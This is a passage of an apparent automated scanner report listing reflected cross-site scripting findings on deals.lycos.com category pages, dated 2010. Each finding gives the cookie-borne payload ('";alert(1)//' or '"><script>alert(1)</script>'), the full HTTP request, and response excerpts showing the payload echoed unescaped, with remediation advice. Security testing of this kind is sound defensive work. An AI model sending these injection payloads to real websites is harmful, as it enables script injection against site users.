Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A409c8"%3balert(1)//11fafd7bd7d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/computer-39",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A409c8";alert(1)//11fafd7bd7d"
});
</script>
...[SNIP]...

1.267. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/dating-services-445

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c53d"><script>alert(1)</script>985194847a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/dating-services-445 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:47 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/dating-services-445&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c53d"><script>alert(1)</script>985194847a&amp;cj=1" alt="tracker" />
...[SNIP]...

1.268. http://deals.lycos.com/deals/category/dating-services-445 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/dating-services-445

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4441"%3balert(1)//cc97a4d4e35 was submitted in the diktfc cookie. This input was echoed as b4441";alert(1)//cc97a4d4e35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/dating-services-445 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab4441"%3balert(1)//cc97a4d4e35; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:49 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/dating-services-445",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab4441";alert(1)//cc97a4d4e35"
});
</script>
...[SNIP]...

1.269. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 530f2"%3balert(1)//66373ee2c96 was submitted in the diktfc cookie. This input was echoed as 530f2";alert(1)//66373ee2c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/digital-cameras-168 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A530f2"%3balert(1)//66373ee2c96; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/digital-cameras-168",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A530f2";alert(1)//66373ee2c96"
});
</script>
...[SNIP]...

1.270. http://deals.lycos.com/deals/category/digital-cameras-168 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ebbb"><script>alert(1)</script>5ed481c16d2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/digital-cameras-168 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/digital-cameras-168&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8ebbb"><script>alert(1)</script>5ed481c16d2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.271. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8df10"><script>alert(1)</script>decb6417e3f was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/electronics-142 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/electronics-142&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A8df10"><script>alert(1)</script>decb6417e3f&amp;cj=1" alt="tracker" />
...[SNIP]...

1.272. http://deals.lycos.com/deals/category/electronics-142 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba404"%3balert(1)//a1b2a499f40 was submitted in the diktfc cookie. This input was echoed as ba404";alert(1)//a1b2a499f40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/electronics-142 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aba404"%3balert(1)//a1b2a499f40; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:08 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/electronics-142",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aba404";alert(1)//a1b2a499f40"
});
</script>
...[SNIP]...

1.273. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/financial-services-439

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d716"%3balert(1)//059f898a8b was submitted in the diktfc cookie. This input was echoed as 9d716";alert(1)//059f898a8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/financial-services-439 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d716"%3balert(1)//059f898a8b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/financial-services-439",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A9d716";alert(1)//059f898a8b"
});
</script>
...[SNIP]...

1.274. http://deals.lycos.com/deals/category/financial-services-439 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/financial-services-439

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3fd"><script>alert(1)</script>7ca665b3883 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/financial-services-439 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/financial-services-439&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6d3fd"><script>alert(1)</script>7ca665b3883&amp;cj=1" alt="tracker" />
...[SNIP]...

1.275. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/food-and-drink-213

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eb80"%3balert(1)//5af42826628 was submitted in the diktfc cookie. This input was echoed as 2eb80";alert(1)//5af42826628 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/food-and-drink-213 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2eb80"%3balert(1)//5af42826628; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/food-and-drink-213",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2eb80";alert(1)//5af42826628"
});
</script>
...[SNIP]...

1.276. http://deals.lycos.com/deals/category/food-and-drink-213 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/food-and-drink-213

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86fb9"><script>alert(1)</script>f0965134d1e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/food-and-drink-213 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/food-and-drink-213&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A86fb9"><script>alert(1)</script>f0965134d1e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.277. http://deals.lycos.com/deals/category/gaming-and-toys-186 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70f84"><script>alert(1)</script>4a6d4c1536e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/gaming-and-toys-186 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A70f84"><script>alert(1)</script>4a6d4c1536e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
